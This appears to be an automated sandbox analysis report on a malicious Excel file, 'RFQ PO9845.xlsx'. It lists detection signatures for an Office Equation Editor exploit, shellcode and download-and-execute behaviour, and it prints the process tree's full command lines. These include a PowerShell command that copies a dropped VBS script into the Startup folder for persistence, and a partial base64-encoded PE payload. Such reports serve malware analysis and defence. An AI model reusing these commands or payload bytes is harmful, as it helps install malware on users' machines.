Edit tour
Windows
Analysis Report
RFQ PO9845.xlsx
Overview
General Information
| Sample Name: | RFQ PO9845.xlsx |
| Analysis ID: | 891787 |
| MD5: | 8525d7dfb6d2b57d88e917b1a31f2a4c |
| SHA1: | 7aa5e1f3cbf790a22112504cb724618685185102 |
| SHA256: | 43e75fa222a5601992a5c49d5b1372db2d13d0963fa0f1a45885d2daacd53850 |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Sigma detected: File Dropped By EQNEDT32EXE
Wscript starts Powershell (via cmd or directly)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Very long command line found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Shellcode detected
Uses ping.exe to sleep
Office equation editor establishes network connection
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Stores large binary data to the registry
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Classification
- System is w7x64
EXCEL.EXE (PID: 2640 cmdline: "C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3)
EQNEDT32.EXE (PID: 204 cmdline: "C:\Progra m Files\Co mmon Files \Microsoft Shared\EQ UATION\EQN EDT32.EXE" -Embeddin g MD5: A87236E214F6D42A65F5DEDAC816AEC8) 
wscript.exe (PID: 3100 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\jyrth fdwrg.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A) 
cmd.exe (PID: 3156 cmdline: "C:\Window s\System32 \cmd.exe" /c ping 12 7.0.0.1 -n 10 & powe rshell -co mmand [Sys tem.IO.Fil e]::Copy(' C:\Windows \system32\ jyrthfdwrg .vbs','C:\ Users\' + [Environme nt]::UserN ame + '\Ap pData\Roam ing\Micros oft\Window s\Start Me nu\Program s\Startup\ Wk.vbs') MD5: AD7B9C14083B52BC532FBA5948342B98) 
PING.EXE (PID: 3180 cmdline: ping 127.0 .0.1 -n 10 MD5: 6242E3D67787CCBF4E06AD2982853144) 
powershell.exe (PID: 3320 cmdline: powershell -command [System.IO .File]::Co py('C:\Win dows\syste m32\jyrthf dwrg.vbs', 'C:\Users\ ' + [Envir onment]::U serName + '\AppData\ Roaming\Mi crosoft\Wi ndows\Star t Menu\Pro grams\Star tup\ Wk.vb s') MD5: 92F44E405DB16AC55D97E3BFE3B132FA) - powershell.exe (PID: 3380 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" [Byte[]] $ rOWg = [sy stem.Conve rt]::FromB ase64strin g('TVqQAAM AAAAEAAAA/ /8AALgAAAA AAAAAQAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAgAAAAA4 fug4AtAnNI bgBTM0hVGh pcyBwcm9nc mFtIGNhbm5 vdCBiZSByd W4gaW4gRE9 TIG1vZGUuD Q0KJAAAAAA AAABQRQAAT AEDAGXtf2Q AAAAAAAAAA OAAAiELAVA AAEQAAAAGA AAAAAAAAmM AAAAgAAAAg AAAAAAAEAA gAAAAAgAAB AAAAAAAAAA GAAAAAAAAA ADAAAAAAgA AAAAAAAMAY IUAABAAABA AAAAAEAAAE AAAAAAAABA AAAAAAAAAA AAAALBiAAB PAAAAAIAAA CgDAAAAAAA AAAAAAAAAA AAAAAAAAKA AAAwAAAAoY gAAHAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAIAAACAA AAAAAAAAAA AAACCAAAEg AAAAAAAAAA AAAAC50ZXh 0AAAACEMAA AAgAAAARAA AAAIAAAAAA AAAAAAAAAA AACAAAGAuc nNyYwAAACg DAAAAgAAAA AQAAABGAAA AAAAAAAAAA AAAAABAAAB ALnJlbG9jA AAMAAAAAKA AAAACAAAAS gAAAAAAAAA AAAAAAAAAQ AAAQgAAAAA AAAAAAAAAA AAAAADkYgA AAAAAAEgAA AACAAUASDE AANguAAADA AAAAAAAACB gAAAIAgAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AABooSQAAB ioeAigBAAA KKh4CKAQAA AoqABMwCAB JAAAAAAAAA HMFAAAKgAE AAAQWKwEWR QMAAAACAAA ADwAAABwAA AArJ3MGAAA KgAIAAAQXK +BzBwAACoA DAAAEGCvTc wgAAAqABAA ABBkrxiouf gEAAARvCQA ACioufgIAA ARvCgAACio ufgMAAARvC wAACioufgQ AAARvDAAAC ir2FysBFiw AfgUAAAQUK BsAAAosJHI BAABwGyhKA AAG0AUAAAI oEAAACm8cA AAKcx0AAAq ABQAABH4FA AAEKhp+BgA ABCoeAoAGA AAEKlZzDQA ABigeAAAKd AYAAAKABwA ABCoeAigfA AAKKhp+BwA ABCoaKA4AA AYqHgIoEwA ACioAABswD wDnBgAAAQA AESAADAAAK CAAAAoWKwE WRQwAAAAFA AAAVwEAAGQ BAAAzAgAAa QIAAHoCAAC lAgAA0wIAA PgCAAAVAwA AaQMAALUDA AA4dQYAAHM hAAAKJSgiA AAKbyMAAAo CKCQAAApyI QAAcBsoSgA ABnItAABwG ihKAAAGbyU AAApyMQAAc BYoSgAABnI /AABwHihKA AAGbyUAAAp yQwAAcBcoS gAABnJPAAB wHShKAAAGb yUAAApyUwA AcBYoSgAAB nJfAABwHCh KAAAGbyUAA ApyYwAAcBg oSgAABnJ1A ABwGihKAAA GbyUAAApye QAAcBooSgA ABnKLAABwH ihKAAAGbyU AAApyjwAAc BwoSgAABnK hAABwHChKA AAGbyUAAAp ypQAAcBooS gAABnKxAAB wFyhKAAAGb yUAAApytQA AcB4oSgAAB nLHAABwFyh KAAAGbyUAA ApyywAAcBk oSgAABnLdA ABwGyhKAAA GbyUAAApy4 QAAcBcoSgA ABnLzAABwG ChKAAAGbyU AAApvJgAAC goGbycAAAo LFzh0/v//B ygkAAAKCxg 4Z/7//wNys QAAcBcoSgA ABhYoKAAAC joEAQAAHxo oKQAACiVy9 wAAcBooSgA ABigqAAAKE wQSBP4WFQA AAW8RAAAKc vsAAHAXKEo AAAYoKwAAC gxyBQEAcBs oSgAABigsA AAKKAEAACs tTHMuAAAKc y8AAAoTBRE FF28wAAAKE QVyEQEAcBw oSgAABm8xA AAKEQVyhQE AcB0oSgAAB ggoMgAACm8 zAAAKJREFb zQAAApvNQA ACiZ+NgAAC nL3AQBwFih KAAAGF283A AAKDRk4mP3 //wlvOAAAC nJTAgBwHSh KAAAGKAIAA CstEglyUwI AcB0oSgAAB ghvOgAACgl vOwAACho4Y v3//wcoPAA ACigWAAAGG zhR/f//OAg EAAAEcl0CA HAWKEoAAAY WKCgAAAo65 gMAAB8aKCk AAAoTBhw4J v3//xEGcz0 AAApyBQEAc BsoSgAABm8 +AAAKKAMAA Cs6ogMAACg qAAAKEwQdO Pj8//8SBP4 WFQAAAW8RA AAKcmECAHA aKEoAAAYoM gAAChMHHjj T/P//EQZya wIAcBsoSgA ABhEHKD8AA AoTCB8JOLb 8//9zLgAAC